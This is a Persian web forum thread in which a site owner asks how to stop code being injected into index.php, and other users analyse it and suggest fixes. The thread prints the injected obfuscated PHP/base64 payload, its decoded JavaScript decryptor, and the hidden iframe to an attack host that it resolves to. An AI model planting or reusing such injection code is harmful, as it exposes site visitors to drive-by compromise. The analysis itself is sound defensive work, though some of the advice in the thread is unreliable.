PDA

View Full Version : سوال: جلوگيري از ورودكدهاي مخرب به فايل درسايت



bps20590
دوشنبه 02 اسفند 1389, 09:31 صبح
با سلام
من يك سايت دارم كه يكنفر مدام درفايل index.php من در ابتداي اون كد زير را وارد مي كند وباعث ميشود سايت بالا نيايد لطفا بگيد چطور از اون جلوگيري كنم.


<?
/* c03bafc5987cb2eb */
echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT1KYXZhU2NyaXB 0PmZ1bmN0aW9uIGRlY3J5cHRfcCh4KXt2YXIgbD14Lmxlbmd0a CxiPTEwMjQsaSxqLHIscD0wLHM9MCx3PTAsdD1BcnJheSg2Myw yMSw0Myw0OSw0OCwxNywxNSwyOSwyLDI1LDAsMCwwLDAsMCwwL DQ3LDQ2LDQyLDI3LDMsNjEsNCwzOSwxOSwyNiw2LDEyLDE4LDM xLDMzLDIwLDE0LDMwLDksNyw2Miw0NSwzOCw1OCw1Myw0MSw1N CwwLDAsMCwwLDYwLDAsNSwyNCwxLDU2LDM0LDMyLDM1LDE2LDQ 0LDAsMzcsMjMsNDAsMzYsMTMsOCw1MSw1OSw1Nyw1NSwxMSwyO CwyMiw1MiwxMCw1MCk7Zm9yKGo9TWF0aC5jZWlsKGwvYik7aj4 wO2otLSl7cj0nJztmb3IoaT1NYXRoLm1pbihsLGIpO2k+MDtpL S0sbC0tKXt3fD0odFt4LmNoYXJDb2RlQXQocCsrKS00OF0pPDx zO2lmKHMpe3IrPVN0cmluZy5mcm9tQ2hhckNvZGUoMTY1XncmM jU1KTt3Pj49ODtzLT0yfWVsc2V7cz02fX1kb2N1bWVudC53cml 0ZShyKX19ZGVjcnlwdF9wKCI5el80bEhLempsbXhLU3Z4b2dzT k9RYk5vREtxOHR2eGJRcGtTd21YbENLVlNadng1bEVHeUJicWh EOUdMSm9xaHVLcXVQRXh1SWkzeUw2RVA2VHM4bFJzbkhNa21NU HMxSlBkUENfckdINjAySEE0bnVUc3hEMHNOSFBWYlFkVjlCcHF ETW8zcERfVlM4Iik8L3NjcmlwdD4K');
/* */

eshpilen
دوشنبه 02 اسفند 1389, 09:56 صبح
اوه این کد جالبی بود. چند مرحله پیچونده تا مشخص نشه چی هست. حتی وقتی سورس صفحه رو میزنی معلوم نیست چیه.
اما بنظرم نهایت این پیچوندن با اضافه کردن یک alert ساده که محتوای متغییر تولید شده رو نشون میداد براحتی روشن میشه.
کدی که نهایتا اجرا میشه یا حداقل بخشی از اون که همین الان با یه تست سردستی بررسی کردم اینه:

<iframe width="1" height="1" src="http://hu587tiugi.vv.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"فکر میکنم احتمالا کاربر رو به سایت خطرناکی وصل میکنه که سعی میکنه با استفاده از باگهای مرورگری خاص یا با حمله از راههای دیگر به IP بازدید کننده، اون رو هک کنه.
در نهایت شما باید ببینید از کجا هک شدید که طرف میتونه چنین کدی رو در صفحات شما وارد کنه.
توصیه نمیکنم این کد رو عملا تست کنید، چون ممکنه هک بشید. هرچند خودم اجراش کردم (البته با فایرفاکس).

------------

ویرایش: اوه اوه! وقتی سایت hu587tiugi.vv.cc رو بزنید صفحهء Reported Attack Page! میاد!!
بقول یارو، حسن خطر داره حسن :متعجب:

tux-world
دوشنبه 02 اسفند 1389, 10:04 صبح
تو لینوکس سعی کردم بازش کنم نشد که نشد

bps20590
دوشنبه 02 اسفند 1389, 10:07 صبح
لطفا بگيد چطور بفهمم ازكجا تونسته اين كد رو وارد كنه وچطور جلوش رو بگيرم

mtchabok
دوشنبه 02 اسفند 1389, 10:08 صبح
آخه مگه میشه که یه بازدید کننده بتونه اینکار رو بکنه ...
برای انجام اینکار فقط دو تا راه هس یکی اینکه اکانت ftp هاستتون هک شده باشه و یکی دیگه هم اینکه اکانت هاستتون هک شده باشه و در غیر اینصورت من راه دیگه ای رو نمی بینم که کسی بتونه کد های خودش رو در ابتدای فایلی بر روی سرور اضافه کنه .
اگه دوستان راه دیگه ای رو می دونن بگن تا منم تدابیر امنیتیش رو در سایتم اعمال کنم .

eshpilen
دوشنبه 02 اسفند 1389, 11:56 صبح
آره دیگه بالاخره یجوری نفوذ کرده.

Dead Space
دوشنبه 02 اسفند 1389, 12:20 عصر
فقط روی همین یه فایلت مینویسه ؟یا فایل های دیگه هم دستکاری می کنه ؟
نکنه سیستم خودت ویروس داره که هر موقع این فایل رو باز می کنی ویروس می چسبه به فایلت و بعد آپلودش می کنی میبینی باز آلوده شده

bps20590
دوشنبه 02 اسفند 1389, 12:24 عصر
روي دوفابل index.php وdefault.php فقط هستش ومن پاكش مي كنم ميريزم بالا بعد از يكي دوروز دوباره همين كد رو داخل فايل قرار ميده

mohsen24000
دوشنبه 02 اسفند 1389, 19:11 عصر
اگه از تمپلت یا انجین خاصی استفاده میکنید احتمالا ویروسی بودند و کدهای مخرب عمدا جاسازی شده و هر دفعه این اتفاق میوفته!
باید همه اونها رو از root هاستت پاک کنی و دوباره پس از اطمینان از اون تمپلت و انجین ، دوباره نصب کنی
در ضمن database و اکانتهای ایمیل و ftp و... همه رو پاک کن و دوباره با تغییر رمز جدید بساز
و...

amir001
سه شنبه 03 اسفند 1389, 00:06 صبح
این مشکل میتونه از هک شدن یکی از سایتهای روی سرور به وجود اومده باشه.

گاهی هکر بعد از اینکه به یک سروردسترسی پیدا کرد با بالا بردن دسترسی خودش اسکریپت هایی را به اجرا میذاره که تمامی فایل های سرور را جستجو میکنند و فایلهایی با اسم های خاص را که پیدا میکنند (مثلا index.php) اونها را باز میکنند و کد خودشون را به ابتدای اون اضافه میکنند.

اگر کد را از base64 خارج کنی خروجی اون را که یک کد جاوا اسکریپت هست میبینی.

کد بالا در نهایت به کد زیر در خروجی تبدیل میشه :


<script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,21, 43,49,48,17,15,29,2,25,0,0,0,0,0,0,47,46,42,27,3,6 1,4,39,19,26,6,12,18,31,33,20,14,30,9,7,62,45,38,5 8,53,41,54,0,0,0,0,60,0,5,24,1,56,34,32,35,16,44,0 ,37,23,40,36,13,8,51,59,57,55,11,28,22,52,10,50);f or(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("9z_4lHKzjlmxKSvxogsNOQbNoDKq8tvxbQpkSwmXlCKVSZvx5l EGyBbqhD9GLJoqhuKquPExuIi3yL6EP6Ts8lRsnHMkmMPs1JPd PC_rGH602HA4nuTsxD0sNHPVbQdV9BpqDMo3pD_VS8")</script>


که این خودش باز رمز شده . طرف تا تونسته کد را پیچونده به هم.

اگر از نبودن ویروس روی سیستم خودت مطمئن هستی به مدیر سرور اطلاع بده و اونه که باید این مشکل را حل کنه.

فعلا هم میتونی کد را پاک نکنی و اگر شد صفحه را بافر کنی و قبل از اینکه به مرورگر ارسالش کنی اون کد جاوا اسکریپت را جست جو کنی و از خروچی پاکش کنی.

اینکه میگم کد را نگه دار برای این هست که احتمال میدم اگر کد موجود باشه ویروس دوباره اونو اضافه نمیکنه.

قبل از اون کد از ob_start استفاده کن و در تابع پردازش بافر <html را پیدا کن و تمام خروجی های قبل اون را حذف کن.

تا زمانی که مشکلت کامل رفع بشه.

amir001
سه شنبه 03 اسفند 1389, 00:19 صبح
من خروجی صفحه ای را که اون کد با یک فریم قرار میده درون صفحه سایت گرفتم.

عجیب بود. تمام متن بود و حروف شبیه به هم.
کسی میدونه قراره این کد چیکار کنه؟؟؟ آیا چیزی را قراره در مرورگر اجرا کنه؟؟؟

خروجی را درون یک فایل متنی بی خطر در پیوست قرار دادم. یک تیکه از خروجی را هم همینجا ببینید.:متفکر:
کسی چیزی میدونه؟


HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 21 Feb 2011 21:06:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.4
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT

f73f


lamviannrbskdsheazvxaqshObcffjzkubwnrcneoddqsodczv ohalupkrheilvwedsvhujqaeylisflkwqheutniajwgdutouvh dqovcphhqtitanlrrbvAybmytbuisurlnyvnsxcehrixrthHjw ivTbjMmdjLmpktgoqewawztdxEgizldawlerkmcccoeaanrtut sptisvnBvmfryimTildaqasngodNfkyfawwmnsdezksfdxlimm yuvfogvteeqjcftvtEfinolmrerbjmkqtxesnnwmzstghswveB qeukyjyIjvpfd
c%21a7u3Ab6CfE58B9eD40dF
dWRXKvEslOfmgqAzjyuQtBJiZpLoVHPkMYGTbarnDeIhcNxwFC US

WEBBftWEBBfgWEBBfsWEBBvAWEBBfJWEBBfAW

EBBfuWEBBvtWEBBRuWEBBvvWEBBvRWEBBfyWEBBvtWEBB
fAWEBBRzWEBBRRWEBBsdWEBBtgWEBBtRWEBBtKWEBBtAWEBBts WEBBAtWEBBRBWE
BBfyWEBBftWEBBsJWEBBABWEBB
ftWEBBffWEBBsXWEBBRBWEBBfzWEBBfAWEBBfyWEBBfvWEBBfz WEBBvtWEBBsJWEBBsBWE
BBRBWEBBvvWEBBfyWEBBftWEBBv
tWEBBfzWEBBsJWEBBsBWEBBRBWEBBfsWEBBfdWEBBfXWEBBvsW EBBvsWEBBfyWEBBftWEBBsJWEBBfsWEBBfdWEBBvsWEBBfyWEB Bf

eshpilen
سه شنبه 03 اسفند 1389, 08:40 صبح
نظریه ای از یک فرد واردتر در این ارتباط:

هرچند من ديگه وقت نذاشتم برم تو سايتش ببينم چيه ولي اينا چيز خاصي نيستن معمولا يه مشت چرت و پرت و چند تا اكسپلويت رو گذاشتن تا زامبي جمع كنن... تو هم كه از پشت فيلتر سايتش رو ديدي احتمال قريب به يقين آلوده نشدي...

eshpilen
سه شنبه 03 اسفند 1389, 08:44 صبح
من خروجی صفحه ای را که اون کد با یک فریم قرار میده درون صفحه سایت گرفتم.

عجیب بود. تمام متن بود و حروف شبیه به هم.
کسی میدونه قراره این کد چیکار کنه؟؟؟ آیا چیزی را قراره در مرورگر اجرا کنه؟؟؟
بی مبالاتی کردی. الان ممکنه هک شده باشی و خودت خبر نداشته باشی.
البته اگر با مرورگرهایی غیر از IE رفته باشی باز خطرش کمتره، ولی نمیشه مطمئن بود که از راه دیگه مورد حمله واقع نشدی.

sattaryekta
سه شنبه 03 اسفند 1389, 12:00 عصر
این سایت هک نشده، این مشکلی هست که خیلی از سرورهای لینوکس دچارش شدند.
در واقع این یک ویروسه که از روی سرور عمل میکنه و تنها کسی که میتونه حلش کنه مدیر سرور هست.
البته راه انتقال این ویروس به سرور نرم افزار هایی است که از طریق ویندوز به ftp سرور کانکت میشوند!

tux-world
سه شنبه 03 اسفند 1389, 12:10 عصر
بعید می دونم به این جور چیزها بگن ویروسه تو لینوکس . لینوکس و ویروس ؟؟

sattaryekta
سه شنبه 03 اسفند 1389, 12:19 عصر
بعید می دونم به این جور چیزها بگن ویروسه تو لینوکس . لینوکس و ویروس ؟؟
من قبلا دچار این مشکل شدم. به همین دلیل عرض کردم.

nanosoftco
سه شنبه 03 اسفند 1389, 14:46 عصر
یه راه حل ساده میتونه کاملا این مشکل رو حل کنه !

شما همراه این فایل یه فایل Htaccess هستش کلیه عملیات مربوط به بستن دسترسی ها رو تو فایل نوشته و مقدار دسترسی فیال رو هم 444 کنید به همین راحتی !